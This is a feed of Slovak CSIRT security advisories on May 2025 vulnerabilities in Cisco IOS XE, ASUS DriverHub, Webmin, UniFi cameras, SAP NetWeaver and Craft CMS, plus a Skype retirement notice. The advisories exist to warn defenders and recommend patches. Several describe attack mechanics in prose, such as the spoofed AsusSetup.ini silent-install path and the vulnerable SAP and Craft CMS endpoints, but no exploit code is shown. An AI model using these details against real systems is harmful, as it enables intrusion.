<p><strong>Spoločnosť Cisco vydala bezpečnostné aktualizácie pre svoje bezdrôtové kontroléry s&nbsp;operačným systémom Cisco IOS XE, ktoré opravujú kritickú zraniteľnosť. CVE-2025-20188 by vzdialený útočník mohol zneužiť na nahratie súborov, vzdialené vykonanie príkazov s&nbsp;oprávneniami používateľa root a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Catalyst 9800-CL Wireless Controllers for Cloud</li>



<li>Catalyst 9800 Embedded Wireless Controller for Catalyst 9300, 9400, and 9500 Series Switches</li>



<li>Catalyst 9800 Series Wireless Controllers</li>



<li>Embedded Wireless Controller na prístupových bodoch Catalyst</li>
</ul>



<p><strong>Pozn.: Zraniteľnosť možno zneužiť len na bezdrôtových kontroléroch s Cisco IOS XE, na ktorých je aktivovaný komponent Out-of-Band AP Image Download.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-20188 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 10,0)</p>



<p>Kritická zraniteľnosť sa nachádza v&nbsp;komponente <strong>Out-of-Band Access Point Image Download</strong> operačného systému Cisco IOC XE Software for Wireless LAN Controllers a&nbsp;spočíva v&nbsp;existencii zabudovaného tokenu JWT (JSON Web Token). Vzdialený neautentifikovaný útočník by ho zaslaním špeciálne vytvorených HTTPS požiadaviek mohol zneužiť na <strong>nahratie súborov</strong>, realizáciu tzv. <strong>path traversal</strong> útokov a&nbsp;<strong>vzdialené vykonanie príkazov s&nbsp;oprávneniami používateľa root.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Zraniteľnosť je možné zneužiť len na bezdrôtových kontroléroch s aktivovaným komponentom Out-of-Band AP Image Download. Či je komponent aktívny možno overiť prostredníctvom konzoly zariadení (#wlc) zadaním príkazu <strong>show running-config | include ap upgrade</strong>. Ak je komponent aktívny, príkaz vráti výstup v tvare <strong>ap upgrade method https</strong>.</p>



<p>V&nbsp;prípade, že je uvedený komponent aktívny, administrátorom odporúčame prostredníctvom aplikácie <a href="https://sec.cloudapps.cisco.com/security/center/softwarechecker.x">Cisco Software Checker</a> preveriť dostupnosť bezpečnostných aktualizácií a&nbsp;ich bezodkladnú inštaláciu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-20188">https://nvd.nist.gov/vuln/detail/CVE-2025-20188</a></li>



<li><a href="https://thehackernews.com/2025/05/cisco-patches-cve-2025-20188-100-cvss.html">https://thehackernews.com/2025/05/cisco-patches-cve-2025-20188-100-cvss.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2354/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v nástroji pre manažment ovládačov ASUS DriverHub</title>
		<link>/posts/2351</link>
					<comments>/posts/2351#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 May 2025 15:27:38 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ASUS]]></category>
		<category><![CDATA[DriverHub]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2351</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/05/asus.png" alt="" /></p>Spoločnosť ASUS vydala bezpečnostné aktualizácie svojho nástroja pre manažment ovládačov ASUS DriverHub, ktoré opravujú dve zraniteľnosti, z čoho jedna je...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/05/asus.png" alt="" /></p>
<p><strong>Spoločnosť ASUS vydala bezpečnostné aktualizácie svojho nástroja pre manažment ovládačov ASUS DriverHub, ktoré opravujú dve zraniteľnosti, z čoho jedna je označená ako kritická. Vzdialený neautentifikovaný útočník by zreťazením zraniteľností s&nbsp;identifikátormi CVE-2025-3462 a CVE-2025-3463 mohol vzdialene vykonať škodlivý kód a&nbsp;spôsobiť úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>ASUS DriverHub vo verziách starších ako 1.0.6.0</li>
</ul>



<p><strong>Pozn.: Aplikácia slúži na kontrolu dostupnosti nových aktualizácií, je automaticky inštalovaná pri bootovaní zariadení so špecifickými základnými doskami od spoločnosti ASUS a beží na lokálnom porte 53000.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-3463 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 9,4), <strong>CVE-2025-3462 </strong>(CVSS 3.1 skóre: 8,4)</p>



<p>Bezpečnostné zraniteľnosti spočívajú v nedostatočnom overovaní certifikátov a pôvodu. Vzdialený neautentifikovaný útočník by ich zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na <strong>interakciu s&nbsp;internými funkcionalitami softvéru a&nbsp;vykonanie zmien na zraniteľnom systéme</strong>.</p>



<p>Zreťazením uvedených zraniteľností možno vzdialene vykonať škodlivý kód a získať úplnú kontrolu nad systémom. Úspešné zneužitie vyžaduje interakciu zo strany obete, ktorá musí navštíviť špeciálne vytvorenú webovú stránku na doméne v&nbsp;tvare driverhub.asus.com.&lt;ĽUBOVOĽNÝ TEXT&gt;.com. DriverHub následne zavolá nástroj <em>AsusSetup.exe</em> s&nbsp;flagom <em>-s</em> pre tichú inštaláciu. V&nbsp;takomto prípade nástroj spustí súbor uvedený v parametri <em>SilentInstallRun</em> v&nbsp;súbore <em>AsusSetup.ini</em>. Útočník môže podvrhnúť súbor <em>AsusSetup.ini</em>, ktorý presmeruje inštalátor na škodlivý súbor, ktorý útočník zadá v&nbsp;danom parametri.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu ASUS DriverHub na verziu 1.0.6.0.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.asus.com/content/asus-product-security-advisory/">https://www.asus.com/content/asus-product-security-advisory/</a> (časť 05/09/2025 Security Update for ASUS DriverHub)</li>



<li><a href="https://mrbruh.com/asusdriverhub/">https://mrbruh.com/asusdriverhub/</a></li>



<li><a href="https://thehackernews.com/2025/05/asus-patches-driverhub-rce-flaws.html?m=1">https://thehackernews.com/2025/05/asus-patches-driverhub-rce-flaws.html?m=1</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2351/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť webového manažmentového nástroja Webmin</title>
		<link>/posts/2348</link>
					<comments>/posts/2348#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 May 2025 15:24:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Webmin]]></category>
		<guid isPermaLink="false">/?p=2348</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/05/webmin.png" alt="" /></p>Vývojári webového ovládacieho panelu pre vzdialený manažment serverov Webmin vydali aktualizáciu svojho produktu, ktorá opravuje vysoko závažnú zraniteľnosť. CVE-2025-2774 by...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/05/webmin.png" alt="" /></p>
<p><strong>Vývojári webového ovládacieho panelu pre vzdialený manažment serverov Webmin vydali aktualizáciu svojho produktu, ktorá opravuje vysoko závažnú zraniteľnosť. CVE-2025-2774 by vzdialený autentifikovaný útočník mohol zneužiť na eskaláciu privilégií, vykonanie ľubovoľného kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Webmin vo verziách starších ako 2.302</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-2774 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 8,8)</p>



<p>Vysoko závažná zraniteľnosť spočíva v&nbsp;nedostatočnej neutralizácii CRLF sekvencií v&nbsp;rámci CGI (Common Gateway Interface) požiadaviek. Vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených CGI požiadaviek mohol zneužiť na <strong>eskaláciu privilégií</strong> a&nbsp;<strong>vykonanie škodlivého kódu v&nbsp;kontexte používateľa root</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Vykonanie ľubovoľného kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu Webmin na verziu 2.302 alebo novšiu. Taktiež odporúčame vykonať kontrolu logov zariadenia a&nbsp;sieťových a&nbsp;bezpečnostných prvkov za účelom preverenia prítomnosti pokusov o&nbsp;zneužitie zraniteľnosti.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-282/">https://www.zerodayinitiative.com/advisories/ZDI-25-282/</a></li>



<li><a href="https://securityonline.info/cve-2025-2774-webmin-vulnerability-allows-root-level-privilege-escalation/">https://securityonline.info/cve-2025-2774-webmin-vulnerability-allows-root-level-privilege-escalation/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2348/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v IP kamerách Ubiquiti UniFi Protect</title>
		<link>/posts/2343</link>
					<comments>/posts/2343#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 May 2025 15:21:28 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Ubiquiti]]></category>
		<category><![CDATA[UniFi]]></category>
		<guid isPermaLink="false">/?p=2343</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/05/ubiquiti_unifi.png" alt="" /></p>Spoločnosť Ubiquiti vydala bezpečnostné aktualizácie pre svoje IP kamery UniFi Protect, ktoré opravujú kritickú zraniteľnosť. Zraniteľnosť s&#160;identifikátorom CVE-2025-23123 možno zneužiť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/05/ubiquiti_unifi.png" alt="" /></p>
<p><strong>Spoločnosť Ubiquiti vydala bezpečnostné aktualizácie pre svoje IP kamery UniFi Protect, ktoré opravujú kritickú zraniteľnosť. Zraniteľnosť s&nbsp;identifikátorom CVE-2025-23123 možno zneužiť na vykonanie škodlivého kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ubiquiti UniFi Protect Cameras s&nbsp;firmvérom vo verziách 4.75.43 a starších</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-23123 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 10,0)</p>



<p>Kritická zraniteľnosť vo firmvéri zariadení UniFi Protect Cameras spočíva v&nbsp;pretečení medzipamäte haldy a&nbsp;vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>, vrátane možnosti sledovania kamerových záznamov, ich manipulácie, či zneužitie získaného prístupu na hlbší prienik.</p>



<p><strong>Pozn.: Zraniteľnosť je možné zneužiť len v&nbsp;prípade, že útočník disponuje prístupom do manažmentovej siete, v&nbsp;ktorej sa zraniteľné zariadenie nachádza.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu firmvéru </p>



<figure class="wp-block-image size-full"><img decoding="async" src="/wp-content/uploads/2025/05/logo-UniFiProtectHorizontal.webp" alt="" class="wp-image-2344"/></figure>



<p>Cameras na verziu 4.75.62 alebo novšiu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://community.ui.com/releases/Security-Advisory-Bulletin-047-047/cef86c37-7421-44fd-b251-84e76475a5bc">https://community.ui.com/releases/Security-Advisory-Bulletin-047-047/cef86c37-7421-44fd-b251-84e76475a5bc</a></li>



<li><a href="https://cybersecuritynews.com/ubiquiti-unifi-protect-camera-vulnerability/">https://cybersecuritynews.com/ubiquiti-unifi-protect-camera-vulnerability/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2343/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ďalšia aktívne zneužívaná zraniteľnosť SAP NetWeaver</title>
		<link>/posts/2341</link>
					<comments>/posts/2341#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 May 2025 15:17:40 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[NetWeaver]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[SAP]]></category>
		<guid isPermaLink="false">/?p=2341</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/01/SAP-Netweaver.jpg" alt="" /></p>Spoločnosť SAP vydala bezpečnostné aktualizácie pre opravu ďalšej kritickej zraniteľnosti s identifikátorom CVE-2025-42999, ktorá je aktívne zneužívaná v rámci útokov súvisiacich so...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/01/SAP-Netweaver.jpg" alt="" /></p>
<p><strong>Spoločnosť SAP vydala bezpečnostné aktualizácie pre opravu ďalšej kritickej zraniteľnosti s identifikátorom CVE-2025-42999, ktorá je aktívne zneužívaná v rámci útokov súvisiacich so zneužitím <a href="https://csirt.sk/posts/2325">CVE-2025-31324</a>.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SAP NetWeaver bez aplikovanej bezpečnostnej záplaty <a href="https://me.sap.com/notes/3604119">SAP Security Note 3604119</a> pre Visual Composer Framework</li>
</ul>



<p><em>Pozn.: Zraniteľnosť možno zneužiť len na inštanciách, na ktorých je aktivovaný komponent Visual Composer</em>.</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-42999 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 9,1)</p>



<p>Aktívne zneužívaná kritická zraniteľnosť sa taktiež nachádza v komponente <strong>Visual Composer</strong> a súvisí s nezabezpečenou deserializáciou dát. Vzdialený autentifikovaný útočník s vysokými privilégiami by ju nahratím špeciálne vytvorených súborov obsahujúcich škodlivé serializované dáta mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>Pozn.: Podľa bezpečnostných výskumníkov zo spoločnosti Onapsis je predmetná zraniteľnosť aktívne zneužívaná minimálne od januára 2025.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú <strong>inštaláciu bezpečnostných záplat SAP Security Note  3604119</strong>. Zraniteľnosť je možné dočasne mitigovať aj deaktiváciou komponentu Visual Composer, vypnutím aliasu developmentserver a limitovaním prístupu k URL /developmentserver/metadatauploader.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://me.sap.com/notes/3604119">https://me.sap.com/notes/3604119</a> (vyžaduje prihlásenie do zákazníckeho portálu SAP)</li>



<li><a href="https://www.bleepingcomputer.com/news/security/sap-patches-second-zero-day-flaw-exploited-in-recent-attacks/">https://www.bleepingcomputer.com/news/security/sap-patches-second-zero-day-flaw-exploited-in-recent-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2341/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Skype v máji skončil</title>
		<link>/posts/2337</link>
					<comments>/posts/2337#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 07 May 2025 12:59:59 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Skype]]></category>
		<guid isPermaLink="false">/?p=2337</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/05/Skype-1024x704.jpg" alt="" /></p>Komunikačná platforma Skype, ktorú prevádzkuje spoločnosť Microsoft v rámci balíka svojich služieb, skončila. Od 5.5.2025 je služba dostupná už len pre...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/05/Skype-1024x704.jpg" alt="" /></p>
<p>Komunikačná platforma Skype, ktorú prevádzkuje spoločnosť Microsoft v rámci balíka svojich služieb, skončila. Od 5.5.2025 je služba dostupná už len pre používateľov platených licencií Skype for Business.</p>



<p>Ostatní používatelia majú možnosť prejsť na službu Microsoft Teams Free. Po prihlásení sa do aplikácie Microsoft Teams s použitím údajov pre účet Skype budú zmigrované do nového účtu Teams kontaktné údaje a konverzácie používateľa. Pokiaľ nebudete chcieť využívať MS Teams, môžete si svoje dáta zo Skype <a href="https://support.microsoft.com/sk-sk/skype/how-do-i-export-or-delete-my-skype-data-84546e00-2fef-4c45-8ef6-3a27f83242cc">exportovať</a>. Obe možnosti môžete využiť do januára 2026.</p>



<p>Spoločnosť Microsoft kúpila Skype v roku 2011. Aplikáciu vydali v roku 2003 estónski vývojári Ahti Heinla, Priit Kasesalu a Jaan Tallinn. Počas svojej existencie sa stala symbolom telefónnych hovorov cez internet.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://support.microsoft.com/en-us/skype/skype-is-retiring-in-may-2025-what-you-need-to-know-2a7d2501-427f-485e-8be0-2068a9f90472">https://support.microsoft.com/en-us/skype/skype-is-retiring-in-may-2025-what-you-need-to-know-2a7d2501-427f-485e-8be0-2068a9f90472</a></li>



<li><a href="https://www.forbes.sk/skype-po-vyse-dvoch-desatrociach-od-svojho-vzniku-konci-microsoft-zan-dal-85-miliardy/">https://www.forbes.sk/skype-po-vyse-dvoch-desatrociach-od-svojho-vzniku-konci-microsoft-zan-dal-85-miliardy/</a></li>



<li><a href="https://touchit.sk/skype-konci/717070">https://touchit.sk/skype-konci/717070</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2337/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností apríl 2025</title>
		<link>/posts/2330</link>
					<comments>/posts/2330#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 05 May 2025 15:52:03 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2330</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci apríl 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci apríl 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/05/2025_04_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 04/2025 PDF (568 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2330/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívané kritické zraniteľnosti v Craft CMS</title>
		<link>/posts/2327</link>
					<comments>/posts/2327#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 05 May 2025 15:49:50 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Craft CMS]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2327</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/05/craft-cms-vector-logo.png" alt="" /></p>Vývojári redakčného systému Craft CMS vydali bezpečnostné aktualizácie, ktoré opravujú dve aktívne zneužívané kritické zraniteľnosti. Kritické zraniteľnosti s&#160;označením CVE-2025-32432 a...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/05/craft-cms-vector-logo.png" alt="" /></p>
<p><strong>Vývojári redakčného systému Craft CMS vydali bezpečnostné aktualizácie, ktoré opravujú dve aktívne zneužívané kritické zraniteľnosti. Kritické zraniteľnosti s&nbsp;označením CVE-2025-32432 a CVE-2024-58136 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Craft CMS 5.X vo verziách starších ako 5.6.17</li>



<li>Craft CMS 4.X vo verziách starších ako 4.14.15</li>



<li>Craft CMS 3.X vo verziách starších ako 3.9.15</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-32432 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 10,0)</p>



<p>Kritická zraniteľnosť sa nachádza v&nbsp;zabudovanej funkcionalite na transformáciu obrázkov a&nbsp;spočíva v&nbsp;nedostatočnom overovaní používateľských vstupov. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP POST požiadaviek mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Na úspešné zneužitie zraniteľnosti musí útočník disponovať platným tzv. Asset ID, ktoré slúži na identifikáciu dokumentov a&nbsp;médií v&nbsp;rámci redakčného systému. Platné Asset ID útočník môže získať zaslaním veľkého množstva požiadaviek POST.</p>



<p><strong>CVE-2024-58136 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 9,0)</p>



<p>Zraniteľnosť v PHP frameworku Yii 2 používanom v&nbsp;rámci Craft CMS súvisí s&nbsp;nesprávnym narábaním s&nbsp;obsahom premennej <em>__class</em>. Možno zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Pozn.: Zraniteľnosti sú podľa </strong><a href="https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/"><strong>Orange Cyberdefense SensePort</strong></a><strong> aktívne zneužívané minimálne od 14. februára 2025.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu Craft CMS na verzie 5.6.17, 4.14.15, 3.9.15 alebo novšie.</p>



<p>Vývojári okrem aktualizácie odporúčajú preveriť prítomnosť pokusov o&nbsp;zneužitie zraniteľnosti v&nbsp;logoch Craft CMS (CRAFT_INSTALL_PATH/storage/logs/), webového servera, sieťových a&nbsp;bezpečnostných prvkov. V&nbsp;logoch je potrebné vyhľadať HTTP POST požiadavky na actions/assets/generate-transform, ktoré v&nbsp;tela obsahujú textový reťazec <em>__class</em>. Kompletný návod aj s&nbsp;popisom priebehu útoku a&nbsp;indikátormi kompromitácie (IOC) môžete nájsť na stránke <a href="https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432">vývojárov</a> a <a href="https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/">Orange Cyberdefense SensePort</a>.</p>



<p>V&nbsp;prípade detekcie pokusov o&nbsp;zneužitie zraniteľnosti je potrebné vykonať kontrolu integrity redakčného systému a&nbsp;databázy, zmenu prihlasovacích údajov (CMS, FTP, databázy, atď.) a&nbsp;kryptografického materiálu (SSH kľúče, certifikáty, atď.).</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432">https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-58136">https://nvd.nist.gov/vuln/detail/CVE-2024-58136</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-32432">https://nvd.nist.gov/vuln/detail/CVE-2025-32432</a></li>



<li><a href="https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/">https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/</a></li>



<li><a href="https://thehackernews.com/2025/04/hackers-exploit-critical-craft-cms.html">https://thehackernews.com/2025/04/hackers-exploit-critical-craft-cms.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2327/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v SAP NetWeaver</title>
		<link>/posts/2325</link>
					<comments>/posts/2325#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 05 May 2025 15:47:53 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[NetWeaver]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[SAP]]></category>
		<guid isPermaLink="false">/?p=2325</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/01/SAP-Netweaver.jpg" alt="" /></p>Spoločnosť SAP vydala bezpečnostné aktualizácie svojho aplikačného servera SAP NetWeaver, ktoré opravujú kritickú zraniteľnosť. CVE-2025-31324 možno zneužiť na nahratie súborov,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/01/SAP-Netweaver.jpg" alt="" /></p>
<p><strong>Spoločnosť SAP vydala bezpečnostné aktualizácie svojho aplikačného servera SAP NetWeaver, ktoré opravujú kritickú zraniteľnosť. CVE-2025-31324 možno zneužiť na nahratie súborov, vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom. Zraniteľnosť je v&nbsp;súčasnosti aktívne zneužívaná útočníkmi na prienik do zraniteľných systémov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SAP NetWeaver bez aplikovanej bezpečnostnej záplaty SAP Security Note 3594142 pre Visual Composer Framework</li>
</ul>



<p><em>Pozn.: Zraniteľnosť možno zneužiť len na inštanciách, na ktorých je aktivovaný komponent Visual Composer</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-31324 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 10,0)</p>



<p>Kritická zraniteľnosť sa nachádza v&nbsp;komponente <strong>Visual Composer</strong> a&nbsp;spočíva v&nbsp;nedostatočnej kontrole&nbsp;autorizácie. Zraniteľnosť by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených HTTP POST požiadaviek na /developmentserver/metadatauploader mohol zneužiť na <strong>nahratie ľubovoľných súborov, vykonanie škodlivého kódu a&nbsp;získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>Pre zraniteľnosť je v&nbsp;súčasnosti dostupný proof-of-concept kód demonštrujúci jej zneužitie a je aktívne zneužívaná útočníkmi. Útočníci zraniteľnosť zneužívajú na nahratie webshellov umožňujúcich vykonávanie príkazov na operačnom systéme SAP servera a&nbsp;sťahovanie a&nbsp;spúšťanie ďalšieho škodlivého obsahu</strong>. Výskumníci z&nbsp;ReliaQuest zaznamenali šírenie frameworku BRUTE RATEL slúžiaceho na zabezpečenie perzistentného prístupu k&nbsp;systému a&nbsp;použitie injektov HEAVEN’S GATE na obchádzanie detekčných mechanizmov riešení EDR.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



